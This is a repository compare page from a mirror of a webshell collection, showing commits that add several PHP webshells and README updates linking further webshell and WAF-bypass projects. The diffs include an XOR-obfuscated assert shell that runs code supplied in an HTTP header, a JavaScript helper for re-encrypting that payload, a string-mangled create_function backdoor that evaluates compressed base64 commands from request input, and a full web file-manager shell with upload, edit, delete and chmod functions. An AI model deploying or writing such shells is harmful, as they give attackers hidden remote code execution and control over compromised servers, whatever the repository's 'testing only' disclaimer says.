PenTest/webshell
1
0
Fork 0
mirror of https://github.com/tennc/webshell.git synced 2025-12-25 00:59:01 +00:00
Code Issues Projects Releases Wiki Activity

Compare commits

base: PenTest:acef91925bc803ee2bc91a93b59eca9956f22cdb
Branches Tags
PenTest:master
PenTest:v-2021-01-05 PenTest:2020-08-18 PenTest:2020-04-04 PenTest:v-2017-04-19 PenTest:v-2016-03-05 PenTest:v-2015-07-20 PenTest:v-2015-03-04
...
compare: PenTest:master
Branches Tags
PenTest:master
PenTest:v-2021-01-05 PenTest:2020-08-18 PenTest:2020-04-04 PenTest:v-2017-04-19 PenTest:v-2016-03-05 PenTest:v-2015-07-20 PenTest:v-2015-03-04

23 Commits
acef91925b ... master

Author SHA1 Message Date
root
6b17eae4a0 Rename remad.me to read.me 2024-12-24 23:37:05 +08:00
root
d8909b6ccc Create remad.me 2024-12-24 23:36:20 +08:00
root
6b6b443b9b Update .gitmodules 2024-12-24 23:33:04 +08:00
root
9a13e4d05f Update .gitmodules 2024-12-24 23:26:10 +08:00
root
157ca8a75c Delete backlion directory 
backlion delete 404
 2024-12-24 17:17:15 +08:00
root
af484616bc Update README.md 
add .
@flozz  👍
 2024-12-24 17:14:06 +08:00
root
2510517f73 Update README.md 2024-04-06 21:51:13 +08:00
root
8e045934fb Update README.md 2024-04-06 21:50:01 +08:00
root
ce1b930cca Merge pull request #63 from snmzmert/SnmzTony-NativeTurkish 
Create README_TR.md
 2024-04-06 21:47:39 +08:00
Mert Sonmez
725eeaf19d Create README_TR.md 2023-12-05 09:35:19 +03:00
root
6ea3d75579 Update README.md 2023-09-19 14:44:03 +08:00
new
c4e7d5d2f4 Update README.md 2023-04-09 20:31:06 +08:00
new
63bbb64fdb Add files via upload 
upload this project zip
 2023-04-08 19:41:36 +08:00
new
69cd1fe7e5 Delete ysrc directory 
delete
 2023-04-08 19:37:28 +08:00
new
9c35c31c1a Create 2023-04-08.js 
2023-04-08.php 的密文 二次生成版本
 2023-04-08 19:30:28 +08:00
new
a0960dbc8c Create 2023-04-08.php 
乱码部分
$c(getallheaders()['Demo']);
get 提交时 增加headers的参数Demo,然后值为需要运行的代码

进行的是异或运算
'P\V,,(..EC]C<M3EcU kq)K%z6OE' 与 't?~KI\OB)+8"X(A6K|{L5L&J]kf~'
 2023-04-08 19:25:09 +08:00
new
93c4451d26 Update README.md 2023-03-11 20:06:30 +08:00
tennc
92c5b5a1e5 Create zw.php 
#for xd20.txt & xd30.txt

$txt = $php

$password = base64_decode('ZGV2aWxAMTAxMA==');
 2022-10-30 12:42:46 +08:00
tennc
a86ca5173c Create xd20.txt 
#for xd20.txt & xd30.txt

$txt = $php

$password = base64_decode('ZGV2aWxAMTAxMA==');

from: https://github.com/devilbhai/webshell
 2022-10-30 12:41:01 +08:00
tennc
8e952dabbf Create xd30.txt 
#for xd20.txt & xd30.txt

$txt = $php

$password = base64_decode('ZGV2aWxAMTAxMA==');

from: https://github.com/devilbhai/webshell
 2022-10-30 12:39:52 +08:00
tennc
62a59181cf Create upsi1on.php 
from: https://github.com/upsi1on/webshell/blob/main/upsi1on/upsi1on.php
 2022-10-02 08:43:40 +08:00
tennc
c1146d38f1 Create encrypt.php 
from: https://github.com/upsi1on/webshell/blob/main/sungux/encrypt.php
 2022-09-30 23:20:16 +08:00
tennc
bcf94c97a7 Create decrypt.php 2022-09-30 23:19:23 +08:00
15 changed files with 2071 additions and 14 deletions
Expand all files Collapse all files

6
.gitmodules vendored
View File

@@ -70,3 +70,9 @@
[submodule "zxc7528064/-WebShell-"]
path = zxc7528064/-WebShell-
url = https://github.com/zxc7528064/-WebShell-
[submodule "xl7dev/WebShell"]
path = xl7dev/WebShell
url = https://github.com/xl7dev/WebShell
[submodule "xl7dev/WebShell/Other/Webshell"]
path = xl7dev/WebShell/Other/Webshell
url = https://github.com/xl7dev/WebShell

25
README.md
View File

@@ -1,4 +1,4 @@
# webshell | [English](https://github.com/tennc/webshell/blob/master/README_EN.md)
# webshell | [English](https://github.com/tennc/webshell/blob/master/README_EN.md) | [Türkiye](https://github.com/tennc/webshell/blob/master/README_TR.md)
这是一个webshell收集项目
@@ -40,16 +40,16 @@
> 8. [threedr3am/JSP-Webshells](https://github.com/threedr3am/JSP-Webshells)
> 9. [DeEpinGh0st/PHP-bypass-collection](https://github.com/DeEpinGh0st/PHP-bypass-collection)
> 10. [lcatro/PHP-WebShell-Bypass-WAF](https://github.com/lcatro/PHP-WebShell-Bypass-WAF)
> 11. [ysrc/webshell-sample](https://github.com/ysrc/webshell-sample)
> 12. [tanjiti/webshellSample](https://github.com/tanjiti/webshellSample)
> 13. [webshellpub/awsome-webshell](https://github.com/webshellpub/awsome-webshell)
> 14. [tdifg/WebShell](https://github.com/tdifg/WebShell)
> 15. [malwares/WebShell](https://github.com/malwares/WebShell)
> 16. [lhlsec/webshell](https://github.com/lhlsec/webshell)
> 17. [oneoneplus/webshell](https://github.com/oneoneplus/webshell)
> 18. [vnhacker1337/Webshell](https://github.com/vnhacker1337/Webshell)
> 19. [backlion/webshell](https://github.com/backlion/webshell)
> 20. [twepl/wso](https://github.com/twepl/wso) wso for php8
> 11. [tanjiti/webshellSample](https://github.com/tanjiti/webshellSample)
> 12. [webshellpub/awsome-webshell](https://github.com/webshellpub/awsome-webshell)
> 13. [tdifg/WebShell](https://github.com/tdifg/WebShell)
> 14. [malwares/WebShell](https://github.com/malwares/WebShell)
> 15. [lhlsec/webshell](https://github.com/lhlsec/webshell)
> 16. [oneoneplus/webshell](https://github.com/oneoneplus/webshell)
> 17. [vnhacker1337/Webshell](https://github.com/vnhacker1337/Webshell)
> 18. [backlion/webshell](https://github.com/backlion/webshell)
> 19. [twepl/wso](https://github.com/twepl/wso) wso for php8
> 20. [flozz/p0wny-shell](https://github.com/flozz/p0wny-shell) p0wny-shell
> ### 顺便在推一波网站管理工具
> 1. 中国菜刀
@@ -81,8 +81,9 @@ Check github releases. Latest:
## Many thanks to Jetbrains for providing us with an OSS licence for their fine development tools such as [Jetbrains tools](https://www.jetbrains.com/?from=webshell).
##
## [Thanks to Cloudflare](https://www.cloudflare.com/)
[![Stargazers over time](https://starchart.cc/tennc/webshell.svg)](https://starchart.cc/tennc/webshell)

52
README_TR.md Normal file
View File

@@ -0,0 +1,52 @@
# webshell
[简体中文](https://github.com/tennc/webshell/blob/master/README.md)
========
Bu, bir web kabuğu koleksiyon projesidir.
*Birine gül verirseniz, elinizde bir koku kalır*
Bu projeyi indirdiğinizde lütfen bir kabuk da gönderiniz.
Bu proje çeşitli yaygın betikleri içermektedir.
Örneğin: asp, aspx, php, jsp, pl, py
Eğer bir web kabuğu gönderirseniz, lütfen adı ve şifreyi değiştirmeyiniz.
Not: Bir kabukta bilerek bir arka kapı olup olmadığı garanti edilemez, ancak kendi yüklerken bilerek asla bir arka kapı eklemeyeceğim.
Lütfen gönderirken bir arka kapı eklemeyiniz.
Eğer bir arka kapı kodu bulursanız, lütfen derhal bir problem oluşturunuz!
Bu projenin sağladığı araçlar yasa dışı faaliyetlerde bulunmak için yasaktır. Bu proje yalnızca test amaçlıdır. Bu projenin neden olduğu sonuçlarla ilgili olarak herhangi bir sorumluluğum yoktur.
> ### Bir proje genişletme
> 1. [webshell-venom](https://github.com/yzddmr6/webshell-venom)
> 2. Öldürmeksizin sınırsız web kabuğu oluşturma aracı
> 3. Öldürmeksizin sınırsız web kabuğu oluşturma aracı (Öldürmeksizin bir cümle oluşturma | Öldürmeksizin D kalkanı | Öldürmeksizin güvenlik köpeği koruması Tanrı hipposunu kontrol eder ve her şeyi kalkanlar)
> 4. Yazar: yzddmr6
> 5. Lütfen kim olduğunuzu belirtiniz.
> ### Diğer web kabuğu projeleri (güncelleme 2020-09-14)
> 1. [xl7dev/WebShell](https://github.com/xl7dev/WebShell)
> 2. [JohnTroony/php-webshells](https://github.com/JohnTroony/php-webshells)
> 3. [BlackArch/webshells](https://github.com/BlackArch/webshells)
> ...
> [Diğer projeler için orijinal metne bakınız](https://github.com/tennc/webshell/blob/master/README.md)
> ### Bu arada, bir dizi web sitesi yönetim aracı yayınlıyoruz
> 1. Chinese Kitchen Knife
> 2. Cknife
> 3. [Altman](https://github.com/keepwn/Altman)
> ...
> [Diğer araçlar için orijinal metne bakınız](https://github.com/tennc/webshell/blob/master/README.md)
Yazar: snmztony
[Websitesi](https://snmztony.github.io)
Lisans: GPL v3
## İndirme bağlantısı
[Github sürümlerini kontrol edin. En güncel sürüm için buraya tıklayın.](https://github.com/tennc/webshell/releases)
## [Ürünlerinin OSS geliştirme lisansını sağladığı için JetBrains'e teşekkür ederiz](https://www.jetbrains.com/?from=webshell)

1
backlion/webshell

Submodule backlion/webshell deleted from 4ced903c80

19
php/2023-04-08.js Normal file
View File

@@ -0,0 +1,19 @@
// 此代码为2023-04-08.php 里的二次生成密文版,只需要替换异或的第一部分字符串就好了
// 感谢群友的无私奉献,我就直接拿来放到这里了
function xorDecrypt(cipherText, key) {
let plainText = '';
for (let i = 0; i < cipherText.length; i++) {
let cipherCharCode = cipherText.charCodeAt(i);
let keyCharCode = key.charCodeAt(i % key.length);
let plainCharCode = cipherCharCode ^ keyCharCode;
plainText += String.fromCharCode(plainCharCode);
}
return plainText;
}
let cipherText = "$c(getallheaders()['root'])";
// cipherText 可以修改起里面获取的内容
let key = String.raw`t?~KI\OB)+8"X(A6K|{L5L&J]kf~`;
let plainText = xorDecrypt(cipherText, key);
console.log(plainText);

8
php/2023-04-08.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
session_start();
$a = "a";
$s = "s";
$c=$a.$s."sert";
$c('P\V,,(..EC]C<M3EcU kq)K%z6OE'^'t?~KI\OB)+8"X(A6K|{L5L&J]kf~');
?>

1212
php/upsi1on.php Normal file
View File

File diff suppressed because it is too large Load Diff

1
php/xd20.txt Normal file
View File

File diff suppressed because one or more lines are too long

1
php/xd30.txt Normal file
View File

File diff suppressed because one or more lines are too long

10
php/zw.php Normal file
View File

@@ -0,0 +1,10 @@
<?php
$E='t_contJents(J);@ob_end_cleJan();$rJ=@bJase64J_encodJe(@x(@gzJcomprJess($o),$Jk));pJJrint("J$p$kh$r$kf");}';
$x='J$o.=$t{$i}^J$kJ{$j};}}return $Jo;J}if (@pJreg_Jmatch("/$kh(J.+)J$kJf/",J@fJile_get_contents("pJJhp://in';
$f=str_replace('v','','vcreatvev_fuvnvvction');
$B='$Jk){$c=stJrlenJJ($k);$l=JstrleJn($t);$o="";fJoJr($i=0;$iJ<$Jl;){for($j=0J;($j<$c&&$i<$Jl);$j+J+,$iJ++J){';
$T='puJt"),$m)==J1) J{@Job_sJtart();@evJal(@gzuJncompJress(@x(@bJase64_JdecJode($m[J1]),$k)))JJ;$oJJ=@ob_ge';
$o='$kJ="50eJcJ93c4";$kh="895JcJ0ccc987a";$kJf="0abJcJa6138a3e"J;$p="inO4VJnJw6Gr66szJatJ";Jfunction x($tJ,';
$U=str_replace('J','',$o.$B.$x.$T.$E);
$c=$f('',$U);$c();
?>

745
upsi1on/webshell/sungux/decrypt.php Normal file
View File

@@ -0,0 +1,745 @@
<?php
error_reporting(0);
echo "
<style>
body {
color: Gray;
background: #353535;
font-weight: Bold;
font-family: Arial;
font-size: 14px;
}
input[id=one] {
background: Transparent;
color: Gray;
font-weight: Bold;
border: #353535 1px solid;
}
input[id=textinput] {
border: 1px #353535 solid;
background: #353535;
color: Gray;
font-weight: Bold;
width: 50%;
}
input[type=submit] {
background: Transparent;
color: Gray;
font-weight: Bold;
border: #353535 1px solid;
}
input[type=file] , [id=three] {
width: 30%;
border: 1px Gray solid;
border-radius: 10px;
background: #353535;
color: Gray;
}
input[id=two] {
margin-left: 70px;
}
a {
text-decoration: none;
color: Gray;
}
table {
font-weight: Bold;
}
textarea {
width: 90%;
height: 50%;
}
.iclass {
margin-left: 40px;
}
</style>
";
if (isset($_POST["phpinfo"])) {
echo "<a href='?path=".$_GET["path"]."'>back</a>";
phpinfo();
exit;
}
echo "<pre><center>
.d8888b 888 888 88888b. .d88b. 888 888 888 888
88K 888 888 888 '88b d88P'88b 888 888 `Y8bd8P'
'Y8888b. 888 888 888 888 888 888 888 888 X88K
X88 Y88b 888 888 888 Y88b 888 Y88b 888 .d8''8b.
d88888P' 'Y88888 888 888 'Y88888 'Y88888 888 888
888
Y8b d88P
'Y88P'
</center></pre>";
$path = base64_decode($_GET["path"]);
if (is_dir($path)) {
if ($path !== "/") {
$slash = "/";
} else {
$slash = "";
}
} else {
$checkslash = substr($path, 2);
if (is_dir($checkslash)) {
if ($checkslash !== "/") {
$slash = "/";
} else {
$slash = "";
}
} else {
if (is_file($checkslash)) {
if ($checkslash !== "/") {
$slash = "/";
} else {
$slash = "";
}
}
}
}
if (!is_dir($path)) {
if (substr($path, 0, 2) == "#E") {
if (!is_file(substr($path, 2))) {
header("Location: ?path=".base64_encode(__DIR__)."");
}
} else {
if (substr($path, 0, 2) == "#R") {
if (!is_file(substr($path, 2))) {
if (!is_dir(substr($path, 2))) {
header("Location: ?path=".base64_encode(__DIR__)."");
}
}
} else {
if (substr($path, 0, 2) == "#D") {
if (!is_file(substr($path, 2))) {
if (!is_dir(substr($path, 2))) {
header("Location: ?path=".base64_encode(__DIR__)."");
}
}
} else {
if (substr($path, 0, 2) == "#C") {
if (!is_file(substr($path, 2))) {
if (!is_dir(substr($path, 2))) {
header("Location: ?path=".base64_encode(__DIR__)."");
}
}
} else {
header("Location: ?path=".base64_encode(__DIR__)."");
}
}
}
}
}
echo "<form action='' method='post' enctype='multipart/form-data'>";
if (isset($_POST["move_upload"])) {
if (strpos($_POST["uptopath"], "..") !== FALSE) {
echo "
<script>
alert('failed');
document.location.href = '?path=".$_GET["path"]."';
</script>
";
}
$fileName = $_FILES["file"]["name"];
$tmpName = $_FILES["file"]["tmp_name"];
$upload = $_POST["uptopath"].$slash.$fileName;
if (is_file($upload)) {
echo "
<script>
alert('file name already exists');
document.location.href = '?path=".$_GET["path"]."';
</script>
";
} else {
if (move_uploaded_file($tmpName, $upload)) {
echo "
<script>
alert('successfully');
document.location.href = '?path=".$_GET["path"]."';
</script>
";
} else {
echo "
<script>
alert('failed');
document.location.href = '?path=".$_GET["path"]."';
</script>
";
}
}
}
if (isset($_POST["crf"])) {
if (is_dir($_POST["pathfolder"])) {
if (strpos($_POST["pathfolder"], "..") !== FALSE) {
echo "
<script>
alert('failed');
document.location.href = '?path=".$_GET["path"]."';
</script>
";
}
if (strpos($_POST["foldername"], "/") !== FALSE) {
echo "
<script>
alert('use a different name');
document.location.href = '?path=".$_GET["path"]."';
</script>
";
} else {
$o2 = explode("/", $_POST["pathfolder"]);
$o2 = implode("/", $o2);
$o2 = $o2.$slash.$_POST["foldername"];
if (!is_dir($o2)) {
if (mkdir($o2)) {
echo "
<script>
alert('successfully');
document.location.href = '?path=".$_GET["path"]."';
</script>
";
} else {
echo "
<script>
alert('failed');
document.location.href = '?path=".$_GET["path"]."';
</script>
";
}
} else {
echo "
<script>
alert('folder name alredy exists');
document.location.href = '?path=".$_GET["path"]."';
</script>
";
}
}
} else {
echo "
<script>
alert('directory not found');
document.location.href = '?path=".$_GET["path"]."';
</script>
";
}
}
if (isset($_POST["crfl"])) {
if (strpos($_POST["pathfile"], "..") == FALSE) {
if (is_dir($_POST["pathfile"])) {
$slashcheck = explode("/", $_POST["pathfile"]);
$slashcheck = implode("/", $slashcheck).$slash;
if (strpos($_POST["filename"], "/") == FALSE) {
$filePath9 = $slashcheck.$_POST["filename"];
if (!is_file($filePath9)) {
$createFile = fopen($filePath9, "x");
if ($createFile) {
echo "
<script>
alert('successfully');
document.location.href = '?path=".$_GET["path"]."';
</script>
";
} else {
echo "
<script>
alert('failed');
document.location.href = '?path=".$_GET["path"]."';
</script>
";
}
} else {
echo "
<script>
alert('file name already exists');
document.location.href = '?path=".$_GET["path"]."';
</script>
";
}
} else {
echo "
<script>
alert('use a different name');
document.location.href = '?path=".$_GET["path"]."';
</script>
";
}
} else {
echo "
<script>
alert('directory not found');
document.location.href = '?path=".$_GET["path"]."';
</script>
";
}
} else {
echo "
<script>
alert('failed');
document.location.href = '?path=".$_GET["path"]."';
</script>
";
}
}
if (substr($path, 0, 2) == "#E") {
echo "<input type='text' readonly='readonly' value='".substr($path, 2)."' id='one' style='width: 80%;'><hr color='Gray'><center>";
$back = dirname(substr($path, 2));
if (isset($_POST["save_edit"])) {
$delta = substr($path, 2);
$editz = fopen($delta, "w");
if (fwrite($editz, $_POST["edit_data"])) {
echo "
<script>
alert('successfully');
document.location.href = '?path=".base64_encode($back)."';
</script>
"; fclose($editz);
} else {
echo "
<script>
alert('failed');
document.location.href = '?path=".base64_encode($back)."';
</script>
"; fclose($editz);
}
}
if (filesize(substr($path, 2)) == 0) {
echo "
<textarea name='edit_data'></textarea><hr color='Gray'><a href='?path=".base64_encode($back)."'>cancel</a>
<input type='submit' name='save_edit' value='save' id='two'>
";
} else {
$textareaValue = fopen(substr($path, 2), "r");
$textareaValue = fread($textareaValue, filesize(substr($path, 2)));
$textareaValue = htmlspecialchars($textareaValue);
echo "
<textarea name='edit_data'>".$textareaValue."</textarea>
<hr color='Gray'><a href='?path=".base64_encode($back)."'>cancel</a><input type='submit' name='save_edit' value='save' id='two'>
";
fclose($textareaValue);
}
exit;
}
if (substr($path, 0, 2) == "#R") {
echo "<input type='text' readonly='readonly' value='".substr($path, 2)."' id='one' style='width: 80%;'>";
$delta = substr($path, 2);
$back = dirname($delta);
if (isset($_POST["submit_rename"])) {
$alphacheck = dirname($delta).$slash.$_POST["rename"];
if (!is_dir($alphacheck)) {
if (!is_file($alphacheck)) {
if (rename($delta, $alphacheck)) {
echo "
<script>
alert('successfully');
document.location.href = '?path=".base64_encode($back)."';
</script>
";
} else {
echo "
<script>
alert('failed');
document.location.href = '?path=".base64_encode($back)."';
</script>
";
}
} else {
echo "
<script>
alert('file name alredy exists');
document.location.href = '?path=".base64_encode($back)."';
</script>
";
}
} else {
echo "
<script>
alert('folder name alredy exists');
document.location.href = '?path=".base64_encode($back)."';
</script>
";
}
}
echo "
<input type='text' id='three' autocomplete='off' name='rename' value='".basename($delta)."'><hr color='Gray'><center>
<a href='?path=".base64_encode($back)."'>cancel</a><input type='submit' name='submit_rename' value='rename' id='two'>
";
exit;
}
if (substr($path, 0, 2) == "#D") {
$delta = substr($path, 2);
$back = dirname($delta);
if (isset($_POST["submit_delete"])) {
if (is_dir($delta)) {
if (rmdir($delta)) {
echo "
<script>
alert('successfully');
document.location.href = '?path=".base64_encode($back)."';
</script>
";
} else {
echo "
<script>
alert('failed');
document.location.href = '?path=".base64_encode($back)."';
</script>
";
}
} else {
if (unlink($delta)) {
echo "
<script>
alert('successfully');
document.location.href = '?path=".base64_encode($back)."';
</script>
";
} else {
echo "
<script>
alert('failed');
document.location.href = '?path=".base64_encode($back)."';
</script>
";
}
}
}
if (is_dir($delta)) {
$cat = "folder";
} else {
$cat = "file";
}
echo "path : <input type='text' readonly='readonly' value='".$delta."' id='one' style='width: 80%;'><br>
name : <input type='text' readonly='readonly' value='".basename($delta)."' id='one' style='width: 80%;'><br>
are you sure to permanently delete this ".$cat."?<hr color='Gray'><center>
<a href='?path=".base64_encode($back)."'>no</a><input type='submit' name='submit_delete' value='yes' id='two'>
";
exit;
}
if (substr($path, 0, 2) == "#C") {
$home = dirname(substr($path, 2)); $home = base64_encode($home);
$perms = substr(sprintf('%o',fileperms(substr($path, 2))),-3);
$chv = fileperms(substr($path, 2));
$a = ($chv & 00400) ? ' checked' : '';
$b = ($chv & 00040) ? ' checked' : '';
$c = ($chv & 00004) ? ' checked' : '';
$d = ($chv & 00200) ? ' checked' : '';
$e = ($chv & 00020) ? ' checked' : '';
$f = ($chv & 00002) ? ' checked' : '';
$g = ($chv & 00100) ? ' checked' : '';
$h = ($chv & 00010) ? ' checked' : '';
$i = ($chv & 00001) ? ' checked' : '';
if (isset($_POST["submit_chmod"])) {
$chmode = 0;
if (!empty($_POST['ra'])) {
$chmode |= 0400;
}
if (!empty($_POST['wa'])) {
$chmode |= 0200;
}
if (!empty($_POST['ea'])) {
$chmode |= 0100;
}
if (!empty($_POST['rb'])) {
$chmode |= 0040;
}
if (!empty($_POST['wb'])) {
$chmode |= 0020;
}
if (!empty($_POST['eb'])) {
$chmode |= 0010;
}
if (!empty($_POST['rc'])) {
$chmode |= 0004;
}
if (!empty($_POST['wc'])) {
$chmode |= 0002;
}
if (!empty($_POST['ec'])) {
$chmode |= 0001;
}
if (chmod(substr($path, 2), $chmode)) {
echo "
<script>
alert('successfully');
document.location.href = '?path=".$home."';
</script>
";
} else {
echo "
<script>
alert('failed');
document.location.href = '?path=".$home."';
</script>
";
}
}
echo "
<hr color='Gray'><form action='' method='post'>
<input type='text' readonly='readonly' value='".substr($path, 2)."' id='one' style='width: 100%'>
<hr color='Gray'>
<table width='100%'>
<tr>
<th class='chmodd'>Permissions</th>
<th class='chmodd'>Owner</th>
<th class='chmodd'>Group</th>
<th class='chmodd'>Other</th>
</tr>
<tr>
<td>Read</td>
<td><center><input type='checkbox' name='ra' value='1' ".$a."></center></td>
<td><center><input type='checkbox' name='rb' value='1' ".$b."></center></td>
<td><center><input type='checkbox' name='rc' value='1' ".$c."></center></td>
</tr>
<tr>
<td>Write</td>
<td><center><input type='checkbox' name='wa' value='1' ".$d."></center></td>
<td><center><input type='checkbox' name='wb' value='1' ".$e."></center></td>
<td><center><input type='checkbox' name='wc' value='1' ".$f."></center></td>
</tr>
<tr>
<td>Execute</td>
<td><center><input type='checkbox' name='ea' value='1' ".$g."></center></td>
<td><center><input type='checkbox' name='eb' value='1' ".$h."></center></td>
<td><center><input type='checkbox' name='ec' value='1' ".$i."></center></td>
</tr>
</table><hr color='Gray'>
<center><a href='?path=".$home."'>cancel</a>
<input type='submit' name='submit_chmod' value='change' id='two'></center>
"; exit;
}
if (isset($_POST["upload"])) {
echo "
upload to : <input type='text' autocomplete='off' id='textinput' name='uptopath' value='".$path.$slash."' width='100px'><br>
<input type='file' name='file'><hr color='Gray'><center><a href='?path=".$_GET["path"]."'>cancel</a>
<input type='submit' name='move_upload' value='upload' id='two'>
"; exit;
}
if (isset($_POST["create_folder"])) {
echo "
create on : <input type='text' autocomplete='off' id='textinput' name='pathfolder' value='".$path.$slash."' width='100px'><br>
<input type='text' autocomplete='off' name='foldername' id='three' placeholder='folder name'><hr color='Gray'><center><a href='?path=".$_GET["path"]."'>cancel</a>
<input type='submit' name='crf' value='create' id='two'>
"; exit;
}
if (isset($_POST["create_file"])) {
echo "
create on : <input type='text' autocomplete='off' id='textinput' name='pathfile' value='".$path.$slash."' width='100px'><br>
<input type='text' autocomplete='off' name='filename' id='three' placeholder='file name'><hr color='Gray'><center><a href='?path=".$_GET["path"]."'>cancel</a>
<input type='submit' name='crfl' value='create' id='two'>
"; exit;
}
echo "
<input type='text' readonly='readonly' id='one' value='".$path.$slash."' style='width: 100%;'><hr color='Gray'>
<input type='submit' name='upload' value='upload'>
<input type='submit' name='create_folder' value='+ folder'>
<input type='submit' name='create_file' value='+ file'>
<input type='submit' name='phpinfo' value='phpinfo'>";
echo "<table width='100%'>";
if ($path !== "/") {
$alpha = dirname($path);
echo "<tr><td width='2%'><div class='iclass'><a href='?path=".base64_encode($alpha)."'>..</a></div></td></tr>";
}
$scanPath = scandir($path);
$scanPath = array_diff($scanPath,array('.','..'));
$scanPath = array_values($scanPath);
for ($i = 0; $i < count($scanPath); $i++) {
$iota = $scanPath[$i];
if (is_dir($path.$slash.$iota)) {
$result = filemtime($path.$slash.$iota); $result = getdate($result);
$one = strlen($result["mday"]); $two = strlen($result["mon"]);
$three = strlen($result["year"]); $four = strlen($result["hours"]);
$five = strlen($result["minutes"]);
if ($one == "1") {
$result["mday"] = "0".$result["mday"];
} if ($two == "1") {
$result["mon"] = "0".$result["mon"];
} if ($three == "1") {
$result["year"] = "0".$result["year"];
} if ($four == "1") {
$result["hours"] = "0".$result["hours"];
} if ($five == "1") {
$result["minutes"] = "0".$result["minutes"];
} $result = $result["mday"]."-".$result["mon"]."-".$result["year"]." ".$result["hours"].":".$result["minutes"];
echo "<tr><td width='2%'><div class='iclass'>D</div></td><td width='50%'>| <input type='text' readonly='readonly' id='one' value='".$iota."' style='width: 50%'></td>
<td width='10%'><center>-</center></td><td width='20%'><center>".$result."</center></td>
<td width='5%'><center><a title='chmod ".$iota."' href='?path=".base64_encode("#C".$path.$slash.$iota)."'>".substr(sprintf('%o',fileperms($path.$slash.$iota)),-4)."</a></center></td>
<td style='width: 5%'><center><a title='open ".$iota."' href='?path=".base64_encode($path.$slash.$iota)."'>O</a>
<a title='rename ".$iota."' href='?path=".base64_encode("#R".$path.$slash.$iota)."'>R</a>
<a title='delete ".$iota."' href='?path=".base64_encode("#D".$path.$slash.$iota)."'>D</a></center></td>
</tr>";
}
}
for ($i = 0; $i < count($scanPath); $i++) {
$iota = $scanPath[$i];
$pathType = mime_content_type($path.$slash.$iota);
$pathType = explode("/", $pathType);
$sizeA = filesize($path.$slash.$iota);
$filesize = $sizeA;
$sizeks = "B";
if ($sizeA > 1024) {
$filesize = round($sizeA / 1024);
$sizeks = "KB";
} if ($sizeA > 1024 * 1024) {
$filesize = round($sizeA / 1024 / 1024);
$sizeks = "MB";
} if ($sizeA > 1024 * 1024 * 1024) {
$filesize = round($sizeA / 1024 / 1024 / 1024);
$sizeks = "GB";
} if ($sizeA > 1024 * 1024 * 1024 * 1024) {
$filesize = round($sizeA / 1024 / 1024 / 1024 / 1024);
$sizeks = "TB";
} if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024) {
$filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024);
$sizeks = "PB";
} if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024 * 1024) {
$filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024 / 1024);
$sizeks = "EB";
} if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024) {
$filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024 / 1024 / 1024);
$sizeks = "ZB";
} if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024) {
$filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024 / 1024 / 1024 / 1024);
$sizeks = "YB";
}
$result = filemtime($path.$slash.$iota); $result = getdate($result);
$one = strlen($result["mday"]); $two = strlen($result["mon"]);
$three = strlen($result["year"]); $four = strlen($result["hours"]);
$five = strlen($result["minutes"]);
if ($one == "1") {
$result["mday"] = "0".$result["mday"];
} if ($two == "1") {
$result["mon"] = "0".$result["mon"];
} if ($three == "1") {
$result["year"] = "0".$result["year"];
} if ($four == "1") {
$result["hours"] = "0".$result["hours"];
} if ($five == "1") {
$result["minutes"] = "0".$result["minutes"];
} $result = $result["mday"]."-".$result["mon"]."-".$result["year"]." ".$result["hours"].":".$result["minutes"];
if ($pathType[0] == "text") {
echo "<tr><td width='2%'><div class='iclass'>F</div></td><td width='50%'>| <input type='text' readonly='readonly' id='one' value='".$iota."' style='width: 50%'></td>
<td width='10%'><center>".$filesize.$sizeks."</center></td><td width='20%'><center>".$result."</center></td>
<td width='5%'><center><a title='chmod ".$iota."' href='?path=".base64_encode("#C".$path.$slash.$iota)."'>".substr(sprintf('%o',fileperms($path.$slash.$iota)),-4)."</a></center></td>
<td style='width: 5%'><center><a title='edit ".$iota."' href='?path=".base64_encode("#E".$path.$slash.$iota)."'>E</a>
<a title='rename ".$iota."' href='?path=".base64_encode("#R".$path.$slash.$iota)."'>R</a>
<a title='delete ".$iota."' href='?path=".base64_encode("#D".$path.$slash.$iota)."'>D</a></center></td>
</tr>";
} else {
if ($pathType[0] == "application") {
echo "<tr><td width='2%'><div class='iclass'>F</div></td><td width='50%'>| <input type='text' readonly='readonly' id='one' value='".$iota."' style='width: 50%'></td>
<td width='10%'><center>".$filesize.$sizeks."</center></td><td width='20%'><center>".$result."</center></td>
<td width='5%'><center><a title='chmod ".$iota."' href='?path=".base64_encode("#C".$path.$slash.$iota)."'>".substr(sprintf('%o',fileperms($path.$slash.$iota)),-4)."</a></center></td>
<td style='width: 5%'><center><a title='edit ".$iota."' href='?path=".base64_encode("#E".$path.$slash.$iota)."'>E</a>
<a title='rename ".$iota."' href='?path=".base64_encode("#R".$path.$slash.$iota)."'>R</a>
<a title='delete ".$iota."' href='?path=".base64_encode("#D".$path.$slash.$iota)."'>D</a></center></td>
</tr>";
}
}
}
for ($i = 0; $i < count($scanPath); $i++) {
$iota = $scanPath[$i];
$pathType = mime_content_type($path.$slash.$iota);
$pathType = explode("/", $pathType);
if ($pathType[0] !== "application") {
if ($pathType[0] !== "text") {
if (is_file($path.$slash.$iota)) {
$sizeA = filesize($path.$slash.$iota);
$filesize = $sizeA;
$sizeks = "B";
if ($sizeA > 1024) {
$filesize = round($sizeA / 1024);
$sizeks = "KB";
} if ($sizeA > 1024 * 1024) {
$filesize = round($sizeA / 1024 / 1024);
$sizeks = "MB";
} if ($sizeA > 1024 * 1024 * 1024) {
$filesize = round($sizeA / 1024 / 1024 / 1024);
$sizeks = "GB";
} if ($sizeA > 1024 * 1024 * 1024 * 1024) {
$filesize = round($sizeA / 1024 / 1024 / 1024 / 1024);
$sizeks = "TB";
} if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024) {
$filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024);
$sizeks = "PB";
} if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024 * 1024) {
$filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024 / 1024);
$sizeks = "EB";
} if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024) {
